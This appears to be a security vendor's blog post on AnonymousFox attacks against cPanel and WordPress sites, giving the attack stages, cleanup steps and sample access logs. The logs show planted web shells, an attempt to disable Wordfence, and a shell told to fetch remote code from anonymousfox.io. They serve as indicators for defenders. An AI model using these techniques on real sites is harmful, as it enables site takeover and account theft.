New AnonymousFox attacks emerged this month, affecting cPanel based sites.
Next, I will detail how the attack develops:
1. Using malicious scripts injected via WordPress, .contactemail is being edited.
2. cPanel password is changed, using a newly created email [email protected]
Alternatively, secondary email accounts are created like [email protected]
3. WordPress users with administrator privileges are created.
Look for “guest” username.
4. Malicious WordPress plugins are added, which are used to manage files
Need help? Let us clean your site.
What do do when dealing with AnonymousFox hack?
- Don’t panic.
- Ask your web host to perform a backup, which will include database, emails and web files.
- Download a backup copy on your local computer, to secure the latest working site version.
- Disable all active sites.
- If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
- Check for newly created subdomains.
- Go to cPanel > Contact Information and change primary and secondary email and restore Pushbullet token.
- Remove all FTP accounts under FTP Accounts.
- Remove all suspicious email accounts under Email Accounts.
- Move all files under /home/user/public_html/ to a safe area.
- If you have addon sites or subdomains, you should each to safe area, outside public access.
- Clean your WordPress site. A recent guide available here: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”
Anonymous Fox has an official website, where members describe the current tools used for the attacks.
Need help? Try our Free security analysis.
Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU
18.104.22.168 – – [02/Apr/2021:07:01:10 +1100] “POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200
22.214.171.124 – – [02/Apr/2021:01:16:58 +1100] “GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200 3703 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0”
[06/Mar/2021:06:16:50 +1100] “GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1” 403 1167 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:06:16:58 +1100] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.1” 200
[06/Mar/2021:06:17:05 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/1.1” 200
[06/Mar/2021:23:27:12 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/2” 200
[06/Mar/2021:23:27:15 +1100] “GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 100 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:23:27:18 +1100] “POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 157 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[29/Mar/2021:02:26:41 +1100] “GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1” 200 3570 “https://example.com/wp-content/plugins/erwvxqtoto/up.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36”